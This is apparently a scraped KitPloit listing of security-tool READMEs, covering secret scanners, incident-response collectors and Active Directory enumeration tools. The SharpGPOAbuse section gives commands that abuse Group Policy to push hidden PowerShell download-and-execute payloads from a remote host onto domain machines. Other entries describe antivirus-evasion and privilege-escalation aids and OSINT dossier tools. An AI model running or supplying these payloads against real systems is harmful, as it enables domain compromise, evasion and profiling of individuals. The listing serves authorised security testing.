Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5816 articles
Browse latest View live

SecretScanner - Find Secrets And Passwords In Container Images And File Systems

$
0
0


Deepfence SecretScanner can find any potential secrets in container images or file systems.


What are Secrets?

Secrets are any kind of sensitive or private data which gives authorized users permission to access critical IT infrastructure (such as accounts, devices, network, cloud based services), applications, storage, databases and other kinds of critical data for an organization. For example, passwords, AWS access IDs, AWS secret access keys, Google OAuth Key etc. are secrets. Secrets should be strictly kept private. However, sometimes attackers can easily access secrets due to flawed security policies or inadvertent mistakes by developers. Sometimes developers use default secrets or leave hard-coded secrets such as passwords, API keys, encryption keys, SSH keys, tokens etc. in container images, especially during rapid development and deployment cycles in CI/CD pipeline. Also, sometimes users store passwords in plain text. Leakage of secrets to unauthorized entities can put your organization and infrastructure at serious security risk.

Deepfence SecretScanner helps users scan their container images or local directories on hosts and outputs a JSON file with details of all the secrets found.

Check out our blog for more details.


Command line options
$ ./SecretScanner --help

Usage of ./SecretScanner:
-config-path string
Searches for config.yaml from given directory. If not set, tries to find it from SecretScanner binary's and current directory
-debug-level string
Debug levels are one of FATAL, ERROR, IMPORTANT, WARN, INFO, DEBUG. Only levels higher than the debug-level are displayed (default "ERROR")
-image-name string
Name of the image along with tag to scan for secrets
-json-filename string
Output json file name. If not set, it will automatically create a filename based on image or dir name
-local string
Specify local directory (absolute path) which to scan. Scans only given directory recursively.
-max-multi-match uint
Maximum number of matches of same pattern in one file. This is used only when multi-match option is enabled. (default 3)
-max-secrets uint
Maximum number of secrets to find in one container image or file system. (default 1000)
-maximum-file-size uint
Maximum file size to process in KB (default 256)
-multi-match
Output multiple matches of same pattern in one file. By default, only one match of a pattern is output for a file for better performance
-output-path string
Output directory where json file will be stored. If not set, it will output to current directory
-temp-directory string
Directory to process and store repositories/matches (default "/tmp")
-threads int
Number of concurrent threads (default number of logical CPUs)


Quickly Try Using Docker

Install docker and run SecretScanner on a container image using the following instructions:

  • Build SecretScanner:

docker build --rm=true --tag=deepfenceio/secretscanning:latest -f Dockerfile .

  • Or, pull the latest build from docker hub by doing:

docker pull deepfenceio/secretscanning

  • Pull a container image for scanning:

docker pull node:8.11

  • Run SecretScanner:
    • Scan a container image:

      docker run -it --rm --name=deepfence-secretscanner -v $(pwd):/home/deepfence/output -v /var/run/docker.sock:/var/run/docker.sock -v /usr/bin/docker:/usr/bin/docker deepfenceio/secretscanning -image-name node:8.11
    • Scan a local directory:

      docker run -it --rm --name=deepfence-secretscanner -v $(pwd):/home/deepfence/output -v /var/run/docker.sock:/var/run/docker.sock -v /usr/bin/docker:/usr/bin/docker deepfenceio/secretscanning -local /home/deepfence/src/SecretScanner/test

By default, SecretScanner will also create json files with details of all the secrets found in the current working directory. You can explicitly specify the output directory and json filename using the appropriate options.


Build Instructions
  1. Install Docker
  2. Install Hyperscan
  3. Install go for your platform (version 1.14)
  4. Install go modules, if needed: gohs, yaml.v3 and color
  5. go get github.com/deepfence/SecretScanner will download and build SecretScanner automatically in $GOPATH/bin or $HOME/go/bin directory. Or, clone this repository and run go build -v -i to build the executable in the current directory.
  6. Edit config.yaml file as needed and run the secret scanner with the appropriate config file directory.

For reference, the Install file has commands to build on an ubuntu system.


Instructions to Run on Local Host
./SecretScanner --help

./SecretScanner -config-path /path/to/config.yaml/dir -local test

./SecretScanner -config-path /path/to/config.yaml/dir -image-name node:8.11

Sample SecretScanner Output



Credits

We have built upon the configuration file from shhgit project.


Disclaimer

This tool is not meant to be used for hacking. Please use it only for legitimate purposes like detecting secrets on the infrastructure you own, not on others' infrastructure. DEEPFENCE shall not be liable for loss of profit, loss of business, other financial loss, or any other loss or damage which may be caused, directly or indirectly, by the inadequacy of SecretScanner for any purpose or use thereof or by any defect or deficiency therein.




Tuf - A Framework For Securing Software Update Systems

$
0
0


This repository is the reference implementation of The Update Framework (TUF). It is written in Python and intended to conform to version 1.0 of the TUF specification. This implementation is in use in production systems, but is also intended to be a readable guide and demonstration for those working on implementing TUF in their own languages, environments, or update systems.


About The Update Framework

The Update Framework (TUF) design helps developers maintain the security of a software update system, even against attackers that compromise the repository or signing keys. TUF provides a flexible specification defining functionality that developers can use in any software update system or re-implement to fit their needs.

TUF is hosted by the Linux Foundation as part of the Cloud Native Computing Foundation (CNCF) and its design is used in production by various tech companies and open source organizations. A variant of TUF called Uptane is used to secure over-the-air updates in automobiles.

Please see the TUF Introduction and TUF's website for more information about TUF!


Documentation

Contact

Please contact us via our mailing list. Questions, feedback, and suggestions are welcomed on this low volume mailing list.

We strive to make the specification easy to implement, so if you come across any inconsistencies or experience any difficulty, do let us know by sending an email, or by reporting an issue in the GitHub specification repo.


Security Issues and Bugs

Security issues can be reported by emailing jcappos@nyu.edu.

At a minimum, the report must contain the following:

  • Description of the vulnerability.
  • Steps to reproduce the issue.

Optionally, reports that are emailed can be encrypted with PGP. You should use PGP key fingerprintE9C0 59EC 0D32 64FA B35F 94AD 465B F9F6 F8EB 475A.

Please do not use the GitHub issue tracker to submit vulnerability reports. The issue tracker is intended for bug reports and to make feature requests. Major feature requests, such as design changes to the specification, should be proposed via a TUF Augmentation Proposal (TAP).


Limitations

The reference implementation may behave unexpectedly when concurrently downloading the same target files with the same TUF client.


License

This work is dual-licensed and distributed under the (1) MIT License and (2) Apache License, Version 2.0. Please see LICENSE-MIT and LICENSE.


Acknowledgements

This project is hosted by the Linux Foundation under the Cloud Native Computing Foundation. TUF's early development was managed by members of the Secure Systems Lab at New York University. We appreciate the efforts of Konstantin Andrianov, Geremy Condra, Vladimir Diaz, Yuyu Zheng, Sebastien Awwad, Santiago Torres-Arias, Trishank Kuppusamy, Zane Fisher, Pankhuri Goyal, Tian Tian, Konstantin Andrianov, and Justin Samuel who are among those who helped significantly with TUF's reference implementation. Contributors and maintainers are governed by the CNCF Community Code of Conduct.

This material is based upon work supported by the National Science Foundation under Grant Nos. CNS-1345049 and CNS-0959138. Any opinions, findings, and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the National Science Foundation.



SharpGPOAbuse - Tool To Take Advantage Of A User'S Edit Rights On A Group Policy Object (GPO) In Order To Compromise The Objects That Are Controlled By That GPO

$
0
0


SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.

More details can be found at the following blog post: https://labs.mwrinfosecurity.com/tools/sharpgpoabuse


Compile Instructions

Make sure the necessary NuGet packages are installed properly and simply build the project in Visual Studio.


Usage
Usage:
SharpGPOAbuse.exe <AttackType> <AttackOptions>

Attack Options

Adding User Rights
Options required to add new user rights:
--UserRights
Set the new rights to add to a user. This option is case sensitive and a comma separeted list must be used.
--UserAccount
Set the account to add the new rights.
--GPOName
The name of the vulnerable GPO.

Example:
SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO"

Adding a Local Admin
Options required to add a new local admin:
--UserAccount
Set the name of the account to be added in local admins.
--GPOName
The name of the vulnerable GPO.

Example:
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"

Configuring a User or Computer Logon Script
Options required to add a new user or computer startup script:
--ScriptName
Set the name of the new startup script.
--ScriptContents
Set the contents of the new startup script.
--GPOName
The name of the vulnerable GPO.

Example:
SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"

If you want to run the malicious script only on a specific user or computer controlled by the vulnerable GPO, you can add an if statement within the malicious script:

SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "if %username%==<targetusername> powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"

Configuring a Computer or User Immediate Task
Options required to add a new computer or user immediate task:

--TaskName
Set the name of the new computer task.
--Author
Set the author of the new task (use a DA account).
--Command
Command to execute.
--Arguments
Arguments passed to the command.
--GPOName
The name of the vulnerable GPO.

Additional User Task Options:
--FilterEnabled
Enable Target Filtering for user immediate tasks.
--TargetUsername
The user to target. The malicious task will run only on the specified user. Should be in the format <DOMAIN>\<USERNAME>
--TargetUserSID
The targeted user's SID.

Additional Computer Task Options:
--FilterEnabled
Enable Target Filtering for computer immediate tasks.
--TargetDnsName
The DNS name of the computer to target. The malicious task will run only on the specified host.

Example:
SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"

If you want to run the malicious task only on a specific user or computer controlled by the vulnerable GPO you can use something similar to the following:

SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO" --FilterEnabled --TargetDnsName target.domain.com


Additional Options
OptionDescription
--DomainControllerSet the target domain controller
--DomainSet the target domain
--ForceOverwrite existing files if required

Example Output
beacon> execute-assembly /root/Desktop/SharpGPOAbuse.exe --AddComputerTask --TaskName "New Task" --Author EUROPA\Administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.141:80/a'))\"" --GPOName "Default Server Policy"
[*] Tasked beacon to run .NET program: SharpGPOAbuse_final.exe --AddComputerTask --TaskName "New Task" --Author EUROPA\Administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"I
EX ((new-object net.webclient).downloadstring('http://10.1.1.141:80/a'))\"" --GPOName "Default Server Policy"
[+] host called home, sent: 171553 bytes
[+] received output:
[+] Domain = europa.com
[+] Domain Controller = EURODC01.europa.com
[+] Distinguished Name = CN=Policies,CN=System,DC=europa,DC=com
[+] GUID of "Default Server Policy" is: {87 7CB769-3543-40C6-A757-F2DF4E5E28BD}
[+] Creating file \\europa.com\SysVol\europa.com\Policies\{877CB769-3543-40C6-A757-F2DF4E5E28BD}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!


DefenderCheck - Identifies The Bytes That Microsoft Defender Flags On

$
0
0


Quick tool to help make evasion work a little bit easier.


Takes a binary as input and splits it until it pinpoints that exact byte that Microsoft Defender will flag on, and then prints those offending bytes to the screen. This can be helpful when trying to identify the specific bad pieces of code in your tool/payload.

Note: Defender must be enabled on your system, but the realtime protection and automatic sample submission features should be disabled.



SharpHound3 - C# Data Collector For The BloodHound Project

$
0
0


Get SharpHound

The latest build of SharpHound will always be in the BloodHound repository here


Compile Instructions

SharpHound is written using C# 9.0 features. To easily compile this project, use Visual Studio 2019.

If you would like to compile on previous versions of Visual Studio, you can install the Microsoft.Net.Compilers nuget package.

Building the project will generate an executable as well as a PowerShell script that encapsulates the executable. All dependencies are rolled into the binary.


Requirements

SharpHound is designed targetting .Net 4.5. Sharphound must be run from the context of a domain user, either directly through a logon or through another method such as RUNAS.


More Information

Usage

Enumeration Options
  • CollectionMethod - The collection method to use. This parameter accepts a comma separated list of values. Has the following potential values (Default: Default):
    • Default - Performs group membership collection, domain trust collection, local group collection, session collection, ACL collection, object property collection, and SPN target collection
    • Group - Performs group membership collection
    • LocalAdmin - Performs local admin collection
    • RDP - Performs Remote Desktop Users collection
    • DCOM - Performs Distributed COM Users collection
    • PSRemote - Performs Remote Management Users collection
    • GPOLocalGroup - Performs local admin collection using Group Policy Objects
    • Session - Performs session collection
    • ComputerOnly - Performs local admin, RDP, DCOM and session collection
    • LoggedOn - Performs privileged session collection (requires admin rights on target systems)
    • Trusts - Performs domain trust enumeration
    • ACL - Performs collection of ACLs
    • Container - Performs collection of Containers
    • DcOnly - Performs collection using LDAP only. Includes Group, Trusts, ACL, ObjectProps, Container, and GPOLocalGroup.
    • ObjectProps - Performs Object Properties collection for properties such as LastLogon or PwdLastSet
    • All - Performs all Collection Methods except GPOLocalGroup
  • Domain - Search a particular domain. Uses your current domain if null (Default: null)
  • Stealth - Performs stealth collection methods. All stealth options are single threaded.
  • ExcludeDomainControllers - Excludes domain controllers from enumeration (avoids Microsoft ATA flags :) )
  • ComputerFile - Specify a file to load computer names/IPs from
  • LdapFilter - LDAP Filter to apppend to search
  • OverrideUserName - Overrides user name for session enumeration (advanced)
  • RealDNSName - Overrides DNS name for API calls
  • CollectAllProperties - Collect all string LDAP properties instead of a subset
  • WindowsOnly - Limit computer collection to systems with an operating system that matches *Windows*

Loop Options
  • Loop - Loop computer collections
  • LoopDuration - How long to loop for
  • LoopInterval - Duration to wait between loops

Connection Options
  • DomainController - Specify which Domain Controller to connect to (Default: null)
  • LdapPort - Specify what port LDAP lives on (Default: 0)
  • SecureLdap - Connect to AD using Secure LDAP instead of regular LDAP. Will connect to port 636 by default.
  • LdapUsername - Username to connect to LDAP with. Requires the LDAPPassword parameter as well (Default: null)
  • LdapPassword - Password for the user to connect to LDAP with. Requires the LDAPUser parameter as well (Default: null)
  • DisableKerberosSigning - Disables LDAP encryption. Not recommended.

Performance Options
  • PortScanTimeout - Specifies the timeout for ping requests in milliseconds (Default: 2000)
  • SkipPortScan - Instructs Sharphound to skip ping requests to see if systems are up
  • Throttle - Adds a delay after each request to a computer. Value is in milliseconds (Default: 0)
  • Jitter - Adds a percentage jitter to throttle. (Default: 0)

Output Options
  • OutputDirectory - Folder in which to store JSON files (Default: .)
  • OutputPrefix - Prefix to add to your JSON files (Default: "")
  • NoZip - Don't compress JSON files to the zip file. Leaves JSON files on disk. (Default: false)
  • EncryptZip - Add a randomly generated password to the zip file.
  • ZipFileName - Specify the name of the zip file
  • RandomizeFilenames - Randomize output file names
  • PrettyJson - Outputs JSON with indentation on multiple lines to improve readability. Tradeoff is increased file size.
  • DumpComputerStatus - Dumps error codes from connecting to computers

Cache Options
  • CacheFileName - Filename for the Sharphound cache. (Default: .bin)
  • NoSaveCache - Don't save the cache file to disk. Without this flag, .bin will be dropped to disk
  • InvalidateCache - Invalidate the cache file and build a new cache

Misc Options
  • StatusInterval - Interval to display progress during enumeration in milliseconds (Default: 30000)


Watson - Enumerate Missing KBs And Suggest Exploits For Useful Privilege Escalation Vulnerabilities

$
0
0


Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities.


Supported Versions
  • Windows 10 1507, 1511, 1607, 1703, 1709, 1803, 1809, 1903, 1909, 2004
  • Server 2016 & 2019

Usage
C:\> Watson.exe
__ __ _
/ / /\ \ \__ _| |_ ___ ___ _ __
\ \/ \/ / _` | __/ __|/ _ \| '_ \
\ /\ / (_| | |_\__ \ (_) | | | |
\/ \/ \__,_|\__|___/\___/|_| |_|

v2.0

@_RastaMouse

[*] OS Build Number: 14393
[*] Enumerating installed KBs...

[!] CVE-2019-0836 : VULNERABLE
[>] https://exploit-db.com/exploits/46718
[>] https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/

[!] CVE-2019-0841 : VULNERABLE
[>] https://github.com/rogue-kdc/CVE-2019-0841
[>] https://rastamouse.me/tags/cve-2019-0841/

[!] CVE-2019-1064 : VULNERABLE
[>] https://www.rythmstick.net/posts/cve-2019-1064/

[!] CVE-2019-1130 : VULNERABLE
[>] https://github.com/S3cur3Th1sSh1t/SharpByeBear

[!] CVE- 2019-1253 : VULNERABLE
[>] https://github.com/padovah4ck/CVE-2019-1253

[!] CVE-2019-1315 : VULNERABLE
[>] https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html

[*] Finished. Found 6 potential vulnerabilities.

Issues
  • I try to update Watson after every Patch Tuesday, but for potential false positives check the latest supersedence information in the Windows Update Catalog. If you still think there's an error, raise an Issue with the Bug label.

  • If there's a particular vulnerability that you want to see in Watson that's not already included, raise an Issue with the Vulnerability Request label and include the CVE number.

  • If you know of a good exploit for any of the vulnerabilities in Watson, raise an Issue with the Exploit Suggestion label and provide a URL to the exploit.



Maigret - OSINT Username Checker. Collect A Dossier On A Person By Username From A Huge Number Of Sites

$
0
0


The Commissioner Jules Maigret is a fictional French police detective, created by Georges Simenon. His investigation method is based on understanding the personality of different people and their interactions.


About

Purpose of Maigret - collect a dossier on a person by username only, checking for accounts on a huge number of sites.

This is a sherlock fork with cool features under heavy development. Don't forget to regularly update source code from repo.

Currently supported more than 2000 sites (full list), by default search is launched against 500 popular sites in descending order of popularity.


Main features
  • Profile pages parsing, extracting personal info, links to other profiles, etc.
  • Recursive search by new usernames found
  • Search by tags (site categories, countries)
  • Censorship and captcha detection
  • Very few false positives

Installation

NOTE: Python 3.6 or higher and pip is required.

Python 3.8 is recommended.

# install from pypi
$ pip3 install maigret

# or clone and install manually
$ git clone https://github.com/soxoj/maigret && cd maigret
$ pip3 install .

Using examples
maigret user

# make HTML and PDF reports
maigret user --html --pdf

# search on sites marked with tags photo & dating
maigret user --tags photo,dating


# search for three usernames on all available sites
maigret user1 user2 user3 -a

Run maigret --help to get arguments description. Also options are documented in the Maigret Wiki.

With Docker:

docker build -t maigret .

docker run maigret user

Demo with page parsing and recursive username search

PDF report, HTML report



Full console output



UAC - Unix-like Artifacts Collector

$
0
0


UAC is a Live Response collection tool for Incident Response that makes use of built-in tools to automate the collection of Unix-like systems artifacts. It respects the order of volatility and artifacts that are changed during the execution. It was created to facilitate and speed up data collection, and depend less on remote support during incident response engagements.

UAC can also be run against mounted forensic images. Please take a look at the conf/uac.conf file for more details.

You can use your own validated tools during artifact collection. They will be used instead of the built-in ones provided by the target system. Please refer to bin/README.txt for more information.


Supported Systems
  • AIX
  • BSD
  • Linux
  • macOS
  • Solaris

Collectors

Process (-p)

Collect information, calculate MD5 hash, and extract strings from running processes.


Network (-n)

Collect active network connections with related process information.


User (-u)

Collect user accounts information, login related files, and activities. The list of files and directories that will be collected can be found in the conf/user_files.conf file.


System (-y)

Collect system information, system configuration files, and kernel related details. The list of files and directories that will be collected can be found in the conf/system_files.conf file.


Hardware (-w)

Collect low-level hardware information.


Software (-s)

Collect information about installed packages and software.


Disk Volume and File System (-d)

Collect information about disks, volumes, and file systems.


Docker and Virtual Machine (-k)

Collect docker and virtual machines' information.


Body File (-b)

Extract information from files and directories using the stat or stat.pl tool to create a body file. The body file is an intermediate file when creating a timeline of file activity. It is a pipe ("|") delimited text file that contains one line for each file. Plaso or mactime tools can be used to read this file and sorts the contents.


Logs (-l)

Collect log files and directories. The list of files and directories that will be collected can be found in the conf/logs.conf file.


Suspicious Files (-f)

Collect suspicious files and directories. The list of files and directories that will be collected can be found in the conf/suspicious_files.conf file.


Extensions

chkrootkit

Run chkrootkit tool (if available). Note that chrootkit tool is not provided by UAC. You need to either have it available on the target system or download and compile it, and make its static binary file available through bin directory. Please refer to bin/README.txt for more information.


fls

Run Sleuth Kit fls tool (if available) against all mounted block devices. Note that fls tool is not provided by UAC. You need to either have it available on the target system or download and compile it, and make its static binary file available through bin directory. Please refer to bin/README.txt for more information.


hash_exec

Collect MD5 hashes for all executable files. By default, only files smaller than 3072000 bytes (3MB) will be hashed. Please take a look on the extensions/hash_exec/hash_exec.conf file more details. Warning: this extension will change the last accessed date of the touched files.


Profiles

One of the following profiles will be selected automatically according to the kernel name running on the current system. You can manually select one using the -P option though. This is useful when either UAC was not able to identify the correct profile for the current running system or when you are running UAC against a mounted forensic image.


aix

Use this profile to collect AIX artifacts.


bsd

Use this profile to collect BSD-based systems artifacts.
e.g. FreeBSD, NetBSD, OpenBSD, NetScaler...


linux

Use this profile to collect Linux-based systems artifacts.
*e.g. Debian, Red Hat, SuSE, Arch Linux, OpenWRT, QNAP QTS, Linux running on top of Windows (WSL)...


macos

Use this profile to collect macOS artifacts.


solaris

Use this profile to collect Solaris artifacts.


Options

Date Range (-R)

The range of dates to be used during logs, suspicious files, user files, and hash executable files collection. The date range is used to limit the amount of data collected by filtering files using find's -atime, -mtime or -ctime parameter. By default, UAC will search for files that data was last modified (-mtime) OR status last changed (-ctime) within the given date range. Please refer to conf/uac.conf for more details. The standard format is YYYY-MM-DD for a starting date and no ending date. For an ending date, use YYYY-MM-DD..YYYY-MM-DD.


Output File Transfer (-T)

Transfer the output file to a remote server using scp. The destination must be specified in the form [user@]host:[path]. It is recommended to use SSH key authentication in order to automate the transfer and avoid any password prompt during the process.


Debug (-D)

Increase debugging level.


Verbose (-V)

Increase verbosity level.


Run as non-root (-U)

Allow UAC to be run by a non-root user. Note that data collection will be limited.


Configuration Files

conf/uac.conf

The main UAC configuration file.


conf/logs.conf

Directory or file paths that will be searched and collected by the logs (-l) collector. If a directory path is added, all files and subdirectories will be collected automatically. The find command line tool will be used to search for files and directories, so the patterns added to this file need to be compatible with the -name option. Please check find man pages for instructions.


conf/suspicious_files.conf

Directory or file paths that will be searched and collected by the suspicious files (-f) collector. If a directory path is added, all files and subdirectories will be collected automatically. The find command line tool will be used to search for files and directories, so the patterns added to this file need to be compatible with the -name option. Please check find man pages for instructions.


conf/system_files.conf

Directory or file paths that will be searched and collected by the system files (-y) collector. If a directory path is added, all files and subdirectories will be collected automatically. The find command line tool will be used to search for files and directories, so the patterns added to this file need to be compatible with the -name option. Please check find man pages for instructions.


conf/user_files.conf

Directory or file paths that will be searched and collected by the user files (-u) collector. If a directory path is added, all files and subdirectories will be collected automatically. The find command line tool will be used to search for files and directories, so the patterns added to this file need to be compatible with the -name option. Please check find man pages for instructions.


conf/exclude.conf

Directory or file paths that will be excluded from the collection. If a directory path is added, all files and subdirectories will be skilled automatically. The find command line tool will be used to search for files and directories, so the patterns added to this file need to be compatible with -path and -name options. Please check find man pages for instructions.


Usage
UAC (Unix-like Artifacts Collector)
Usage: ./uac COLLECTORS [-e EXTENSION_LIST] [-P PROFILE] [OPTIONS] [DESTINATION]

COLLECTORS:
-a Enable all collectors.
-p Collect information, calculate MD5 hash, and extract strings from running processes.
-n Collect active network connections with related process information.
-u Collect user accounts information, login related files, and activities.
-y Collect system information, system configuration files, and kernel related details.
-w Collect low-level hardware information.
-s Collect information about installed packages and software.
-d Collect information about disks, volumes, and file systems.
-k Collect docker and virtual machines information.
-b Extract information from files and directories using the stat tool to create a body file.
-l Collect log files and directories.
-f Collect suspicious files and directories.

EXTENSIONS:
-e EXTENSION_LIST
Comma-separated list of extensions.
all: Enable all extensions.
chkrootkit: Run chkrootkit tool.
fls: Run Sleuth Kit fls tool.
hash_exec: Hash executable files.

PROFILES:
-P PROFILE Force UAC to use a specific profile.
aix: Use this one to collect AIX artifacts.
bsd: Use this one to collect BSD-based systems artifacts.
linux: Use this one to collect Linux-based systems artifacts.
macos: Use this one to collect macOS artifacts.
solaris: Use this one to collect Solaris artifacts.

OPTIONS:
-R Starting date YYYY-MM-DD or range YYYY-MM-DD..YYYY-MM-DD
-T DESTINATION
Transfer output file to a remote server using scp.
The destination must be specified in the form [user@]host:[path]
-D Increase debugging level.
-V Increase verbosity level.
-U Allow UAC to be run by a non-root user. Note that data collection will be limited.
-v Print version number.
-h Print this help summary page.

DESTINATION:
Specify the directory the output will be saved to.
The default is the current directory.

Output

When UAC finishes, all collected data is compressed and the resulting file is stored in the destination directory. The compressed file is hashed (MD5) and the value is stored on a .md5 file.


Examples

Run all collectors against the current running system and use the current directory as the destination. Extensions will not be run:

./uac -a

Run all collectors and all extensions against the current running system, and use /tmp as the destination directory:

./uac -a -e all /tmp

Run only hash_exec and chkrootkit extensions against the current running system, force linux profile and use /mnt/share as the destination directory:

./uac -e hash_exec,chkrootkit -P linux /mnt/share

Run only process, hardware and logs collectors against the current running system, force solaris profile, use /tmp as the destination directory, and increase verbosity level:

./uac -p -w -l -P solaris -V /tmp



Scylla - The Simplistic Information Gathering Engine | Find Advanced Information On A Username, Website, Phone Number, Etc...

$
0
0


Scylla is an OSINT tool developed in Python 3.6. Scylla lets users perform advanced searches on Instagram & Twitter accounts, websites/webservers, phone numbers, and names. Scylla also allows users to find all social media profiles (main platforms) assigned to a certain username. In continuation, Scylla has shodan support so you can search for devices all over the internet, it also has in-depth geolocation capabilities. Lastly, Scylla has a finance section which allows users to check if a credit/debit card number has been leaked/pasted in a breach and returns information on the cards IIN/BIN. This is the first version of the tool so please contact the developer if you want to help contribute and add more to Scylla.


Installation

1: git clone https://www.github.com/DoubleThreatSecurity/Scylla
2: cd Scylla
3: sudo python3 -m pip install -r requirments.txt
4: python3 scylla.py --help


Usage
  1. python3 scylla.py --instagram davesmith --twitter davesmith
    Command 1 will return account information of that specified Instagram & Twitter account.
  2. python3 scylla.py --username johndoe
    Command 2 will return all the social media (main platforms) profiles associated with that username.
  3. python3 scylla.py --username johndoe -l="john doe"
    Command 3 will repeat command 2 but instead it will also perform an in-depth google search for the "-l" argument. NOTE: When searching a query with spaces make sure you add the equal sign followed by the query in quotations. If your query does not have spaces, it will be as such: python3 scylla.py --username johndoe -l query
  4. python3 scylla.py --info google.com
    Command 4 will return crucial WHOIS information about the webserver/website.
  5. python3 scylla.py -r +14167777777
    Command 5 will dump information on that phone number (Carrier, Location, etc.)
  6. python3 scylla.py -s apache
    Command 6 will dump all the IP address of apache servers that shodan can grab based on your API key. The query can be anything that shodan can validate.
    A Sample API key is given. I will recommend reading API NOTICE below, for more information.
  7. python3 scylla.py -s webcamxp
    Command 7 will dump all the IP addresses and ports of open webcams on the internet that shodan can grab based on your API key. You can also just use the webcam query but webcamxp returns better results.
    A Sample API key is given. I will recommend reading API NOTICE below, for more information.
  8. python3 scylla.py -g 1.1.1.1
    Command 8 will geolocate the specified IP address. It will return the longitude & latitude, city, state/province, country, zip/postal code region and the district.
  9. python3 scylla.py -c 123456789123456
    Command 9 will retrieve information on the IIN of the credit/debit card number entered. It will also check if the card number has been leaked/pasted in a breach. Scylla will return the card brand, card scheme, card type, currency, country, and information on the bank of that IIN. NOTE: Enter the full card number if you will like to see if it was leaked. If you just want to check data on the first 6-8 digits (a.k.a the BIN/IIN number) just input the first 6,7 or 8 digits of the credit/debit card number. Lastly, all this information generated is public because this is an OSINT tool, and no revealing details can be generated. This prevents malicous use of this option.

Menu
usage: scylla.py [-h] [-v] [-ig INSTAGRAM] [-tw TWITTER] [-u USERNAME]
[--info INFO] [-r REVERSE_PHONE_LOOKUP] [-l LOOKUP]
[-s SHODAN_QUERY] [-g GEO] [-c CARD_INFO]

optional arguments:
-h, --help show this help message and exit
-v, --version returns scyla's version
-ig INSTAGRAM, --instagram INSTAGRAM
return the information associated with specified
instagram account
-tw TWITTER, --twitter TWITTER
return the information associated with specified
twitter account
-u USERNAME, --username USERNAME
find social media profiles (main platforms) associated
with given username
--info INFO return information about the specified website(WHOIS)
w/ geolocation
-r REVERSE_PHO NE_LOOKUP, --reverse_phone_lookup REVERSE_PHONE_LOOKUP
return information about the specified phone number
(reverse lookup)
-l LOOKUP, --lookup LOOKUP
performs a google search of the 35 top items for the
argument given
-s SHODAN_QUERY, --shodan_query SHODAN_QUERY
performs a an in-depth shodan search on any simple
query (i.e, 'webcamxp', 'voip', 'printer', 'apache')
-g GEO, --geo GEO geolocates a given IP address. provides: longitude,
latitude, city, country, zipcode, district, etc.
-c CARD_INFO, --card_info CARD_INFO
check if the credit/debit card number has been pasted
in a breach...dumps sites. Also returns bank
information on the IIN

API NOTICE

The API used for the reverse phone number lookup (free package) has maximum 250 requests. The one used in the program right now will most definetely run out of uses in the near future. If you want to keep generating API keys, go to https://www.numverify.com, and select the free plan after creating an account. Then simply go scylla.py and replace the original API key with your new API key found in your account dashboard. Insert your new key into the keys[] array (at the top of the source). For the Shodan API key, it is just a sample key given to the program. The developer recommends creating a shodan account and adding your own API key to the shodan_api[] array at the top of the source (scylla.py).


Discord Server

https://discord.gg/jtZeWek


Ethical Notice

The developer of this program, Josh Schiavone, written the following code for educational and OSINT purposes only. The information generated is not to be used in a way to harm, stalk or threaten others. Josh Schiavone is not responsible for misuse of this program. May God bless you all.



Burpsuite-Copy-As-XMLHttpRequest - Copy As XMLHttpRequest BurpSuite Extension

$
0
0


The extension adds a context menu to BurpSuite that allows you to copy multiple requests as Javascript's XmlHttpRequest, which simplifies PoC development when exploiting XSS.


Installation
  • download the latest JAR from releases or build manually
  • add JAR to burpsuite using tabs: "Extender" -> "Extensions" -> "Add"

Usage
  • select one request from any tab or a few requests in "Proxy" -> "HTTP history" tab
  • invoke context menu and select "Copy as XMLHttpRequest"


ThreatMapper - Identify Vulnerabilities In Running Containers, Images, Hosts And Repositories

$
0
0

The Deepfence Runtime Threat Mapper is a subset of the Deepfence cloud native workload protection platform, released as a community edition. This community edition empowers the users with following features:

  1. Visualization: Visualize kubernetes clusters, virtual machines, containers and images, running processes, and network connections in near real time.

  2. Runtime Vulnerability Management: Perform vulnerability scans on running containers & hosts as well as container images.

  3. Container Registry Scanning: Check for vulnerabilities in images stored on AWS ECR, Azure Container Registry, Google Container Registry, Docker Hub, Docker Self-Hosted Private Registry, Quay, Harbor, Gitlab and JFrog registries.

  4. CI/CD Scanning: Scan images as part of existing CI/CD Pipelines like CircleCI, Jenkins & GitLab.

  5. Integrations with SIEM, Notification Channels & Ticketing: Ready to use integrations with Slack, PagerDuty, HTTP endpoint, Jira, Splunk, ELK, Sumo Logic and Amazon S3.


Live Demo

https://deepfence.io/community-demo-form/


Architecture

A pictorial depiction of the Deepfence Architecture is below




Feature Availability
